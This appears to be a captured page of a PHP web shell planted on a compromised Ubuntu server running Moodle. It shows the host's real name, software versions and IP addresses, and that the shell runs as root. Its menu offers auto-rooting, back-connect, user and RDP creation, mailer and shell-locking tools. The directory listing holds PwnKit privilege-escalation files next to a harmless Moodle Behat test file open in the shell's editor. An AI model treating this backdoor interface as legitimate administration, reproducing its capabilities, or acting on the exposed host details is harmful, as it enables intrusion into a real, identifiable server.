Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
enrol /
lti /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
basic_settings.feature
2.92
KB
-rwxrwxrwx
index_page.feature
2.6
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : basic_settings.feature
@enrol @enrol_lti Feature: Check that settings are adhered to when creating an enrolment plugin In order to create an LTI enrolment instance As an admin I need to ensure the site-wide settings are used Background: Given the following "users" exist: | username | firstname | lastname | email | | teacher1 | Teacher | 1 | teacher1@example.com | | student1 | Student | 1 | student1@example.com | And the following "courses" exist: | fullname | shortname | format | | Course 1 | C1 | topics | And the following "course enrolments" exist: | user | course | role | | teacher1 | C1 | editingteacher | And I log in as "admin" And I navigate to "Plugins > Enrolments > Manage enrol plugins" in site administration And I click on "Enable" "link" in the "Publish as LTI tool" "table_row" And I navigate to "Plugins > Enrolments > Publish as LTI tool" in site administration And I set the following fields to these values: | Email display | Allow everyone to see my email address | | City/town | Perth | | Select a country | Australia | | Timezone | Australia/Perth | | Institution | Moodle Pty Ltd | And I press "Save changes" And I log out Scenario: As an admin set site-wide settings for the enrolment plugin and ensure they are used Given I log in as "teacher1" And I am on "Course 1" course homepage And I navigate to "Users > Enrolment methods" in current page administration And I select "Publish as LTI tool" from the "Add method" singleselect When I expand all fieldsets Then the field "Email display" matches value "Allow everyone to see my email address" And the field "City/town" matches value "Perth" And the field "Select a country" matches value "Australia" And the field "Timezone" matches value "Australia/Perth" And the field "Institution" matches value "Moodle Pty Ltd" And I set the following fields to these values: | Email display | Hide my email address from non-privileged users | | City/town | Whistler | | Select a country | Canada | | Timezone | America/Vancouver | | Institution | Moodle Pty Ltd - remote | And I press "Add method" And I click on "Edit" "link" in the "Publish as LTI tool" "table_row" And the field "Email display" matches value "Hide my email address from non-privileged users" And the field "City/town" matches value "Whistler" And the field "Select a country" matches value "Canada" And the field "Timezone" matches value "America/Vancouver" And the field "Institution" matches value "Moodle Pty Ltd - remote"
Close